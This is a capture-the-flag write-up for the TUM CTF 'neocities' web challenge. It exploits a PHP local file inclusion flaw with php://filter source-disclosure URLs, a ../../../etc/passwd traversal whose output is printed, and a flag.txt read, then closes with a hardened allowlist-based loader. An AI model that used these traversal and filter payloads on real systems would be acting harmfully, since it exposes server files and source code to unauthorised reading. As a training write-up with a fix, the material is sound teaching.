Title : [writeups] TUM CTF - neocities (Web) #20
Released : 2015-10-26 00:07:44 -0400
Viewed : 1704

So I hope you're well insured, because the nineties have sent us their best thing ever: bright colors and Comic Sans MS. Please end it before everyone dies due to internal bleedings.

1.ctf.link:1123

[Screenshot: preview of the challenge site (tum-ctf-web20)]

After investigating each link, we noticed an unusual URL format (`index.php?page=about.page`), so the first thing to try is PHP's conversion filter (`php://filter`) on the "About" link:

http://1.ctf.link:1123/index.php?page=php://filter/convert.base64-encode/resource=about.page

we got

PHA+TmVvQ2l0aWVzIGlzIGEgdG9vbCB3aGljaCBsZXRzIHlvdSBjcmVhdGUgeW91ciBvd24gaG9tZXBhZ2UgLSBhbmQgZXZlbiBob3N0cyBpdCEgVHJ1c3QgdXMsIHlvdSdsbCBiZSB0aGUga2luZyBvZiB5b3VyIHNjaG9vbCB3aXRoIHlvdXIgcGVyc29uYWwsIE5lb0NpdGllcyBwb3dlcmVkIGhvbWVwYWdlITwvcD4KCjxwPkRpc2NsYWltZXI6IEV5ZXMgbWlnaHQgc3RhcnQgdG8gYmxlZWQuIFRlcm1pbmFsIGlsbG5lc3MgbWF5IGhhcHBlbi4gTmVvQ2l0aWVzIGNhbiB1bmRlciBubyBjaXJjdW1zdGFuY2VzIGJlIGhlbGQgbGlhYmxlIGZvciBkYW1hZ2UgY2F1c2VkIGJ5IG91ciBzdXBlciBhd2Vzb21lIGRlc2lnbiBldmVyeWJvZHkgbGlrZXMuPC9wPgoKPGZvcm0gY2xhc3M9IndlbGwiPgogIDxmaWVsZHNldD4KICAgIDxsZWdlbmQ+Q29udGFjdDwvbGVnZW5kPgogICAgPGxhYmVsPlNheSBzb21ldGhpbmc8L2xhYmVsPgogICAgPHRleHRhcmVhPjwvdGV4dGFyZWE+CiAgICA8c3BhbiBjbGFzcz0iaGVscC1ibG9jayI+R2l2ZSB1cyBmZWVkYmFjayE8L3NwYW4+CiAgICA8YnV0dG9uIHR5cGU9InN1Ym1pdCIgY2xhc3M9ImJ0biBidG4tcHJpbWFyeSI+U3VibWl0PC9idXR0b24+CiAgPC9maWVsZHNldD4KPC9mb3JtPg==

and after decoding it:

<p>NeoCities is a tool which lets you create your own homepage - and even hosts it! Trust us, you'll be the king of your school with your personal, NeoCities powered homepage!</p>

<p>Disclaimer: Eyes might start to bleed. Terminal illness may happen. NeoCities can under no circumstances be held liable for damage caused by our super awesome design everybody likes.</p>

<form class="well">
  <fieldset>
    <legend>Contact</legend>
    <label>Say something</label>
    <textarea></textarea>
    <span class="help-block">Give us feedback!</span>
    <button type="submit" class="btn btn-primary">Submit</button>
  </fieldset>
</form>

Nothing suspicious there. Next, we fetch the source of "index.php" itself with the same filter:

http://1.ctf.link:1123/index.php?page=php://filter/convert.base64-encode/resource=index.php

which, after base64-decoding, gives us:

<?php

$page = isset($_GET["page"]) ? $_GET["page"] : "home.page";

?><!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>NeoCities</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="A timeless theme for Twitter Bootstrap.">
    <meta name="author" content="Divshot, Inc.">
    <style>
    #foo {
        margin-top: 80px;
    }
    </style>

    <!--[if lt IE 9]>
      <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->

    <link href="bootstrap.min.css" rel="stylesheet">
  </head>

  <body id="top" class="preview" data-spy="scroll" data-target=".subnav" data-offset="80">
    <!-- Navbar
        ================================================== -->
     <div class="navbar navbar-fixed-top navbar-inverse">
       <div class="navbar-inner">
         <div class="container">
           <a class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
             <span class="icon-bar"></span>
             <span class="icon-bar"></span>
             <span class="icon-bar"></span>
           </a>
           <a class="brand" href="">NeoCities</a>
           <div class="nav-collapse" id="main-menu">
            <ul class="nav" id="main-menu-left">
              <li><a href="/">Home</a></li>
              <li><a href="/index.php?page=about.page">About</a></li>
              <li><a href="/index.php?page=comingsoon.page">Guestbook</a></li>
            </ul>
           </div>
         </div>
       </div>
     </div>

    <div class="container" id="foo">
      <?=file_get_contents($page)?>
  </div>
  <div class="container"><img src="ie_logo.gif"> <img src="ns_logo.gif"> <img src="noframes.gif"> <img src="notepad.gif"></div>
</body>
</html>

Nice, we got our first clue: <?=file_get_contents($page)?>

This is vulnerable to Local File Inclusion (LFI): `$page` is taken straight from the `page` GET parameter and handed to file_get_contents() with no validation, so any readable path or stream wrapper is accepted.

http://1.ctf.link:1123/index.php?page=../../../etc/passwd


root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false

LFI confirmed. After a few tries, we find the flag sitting in the web root itself:

http://1.ctf.link:1123/index.php?page=flag.txt


FLAG: hxp{the_nineties_called_they_want_their_design_back}
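For comparison, here is an added example (not the challenge's code) of how the page loader could have been hardened. It assumes the `.page` files live in a `pages/` directory next to index.php; the `PAGES_DIR`, `ALLOWED_PAGES` and `loadPage` names are mine.

```php
<?php
// Hardened replacement for the raw file_get_contents($page) echo seen in the
// challenge's index.php. The original passes the ?page= value through untouched,
// so traversal (../../../etc/passwd), arbitrary files (flag.txt) and stream
// wrappers (php://filter/...) are all accepted. Two independent controls close
// that: an allowlist of page names, and a realpath() containment check.
// PAGES_DIR and the page names are assumptions for this example.

const PAGES_DIR = __DIR__ . '/pages';
const ALLOWED_PAGES = ['home', 'about', 'comingsoon'];

function loadPage(?string $requested): string
{
    // Same default as the original: no parameter means the home page.
    $name = $requested ?? 'home';

    // Control 1: exact-match allowlist (strict comparison). The parameter now
    // selects one of the pages offered in the menu instead of naming a file,
    // which rejects "../x", "php://filter/...", "flag.txt" and friends outright.
    if (!in_array($name, ALLOWED_PAGES, true)) {
        http_response_code(404);
        return '<p>Page not found.</p>';
    }

    // Control 2: defence in depth. Even with the allowlist in place, confirm the
    // resolved file is inside PAGES_DIR. realpath() collapses ".." segments,
    // follows symlinks and returns false for files that do not exist, so the
    // prefix comparison is done on canonical paths only.
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . $name . '.page');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        http_response_code(404);
        return '<p>Page not found.</p>';
    }

    return file_get_contents($path);
}
```

In the template, `<?= loadPage($_GET['page'] ?? null) ?>` replaces the original echo; with the allowlist in place, the `php://filter` source disclosure and the `../` traversal shown above both return the 404 body instead of file contents.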